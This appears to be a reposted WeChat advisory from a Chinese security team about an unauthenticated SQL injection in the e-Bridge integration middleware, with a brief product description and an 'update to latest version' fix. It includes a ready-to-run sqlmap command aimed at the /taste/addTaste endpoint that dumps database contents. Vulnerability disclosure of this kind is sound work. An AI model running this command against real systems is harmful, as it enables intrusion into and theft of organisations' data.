由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,开普勒安全团队及文章作者不为此承担任何责任。
开普勒安全团队拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经开普勒安全团队允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。
软件简介
某微云桥(e-Bridge)是上海某微公司在”互联网+”的背景下研发的一款用于桥接互联网开放资源与企业信息化系统的系统集成中间件。截止自本手册编制之日e-Bridge已实现了腾讯微信及阿里钉钉开放接口的封装,企业可以通过e-Bridge快速实现基于微信及钉钉的移动办公应用接入。对于某微协同办公产品e-cology更是实现了可视化的配置接入。后续e-bridge将整合更多的互联网信息化资源,让企业能够更加便利的利用开放的互联网资源进行企业信息化建设。
漏洞简介及复现
通过本漏洞,可实现,前台无条件SQL注入,获取系统数据库内容信息。
EXP:sqlmap -u "http://IP:8088/taste/addTaste?company=1&userName=1&openid=1&source=1&mobile=1*" -v 3 --random-agent --level 5
修复方法
更新至最新的版本
关注本公众号
原文始发于微信公众号(开普勒安全团队):某微云桥e-Bridge前台SQL注入漏洞复现
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论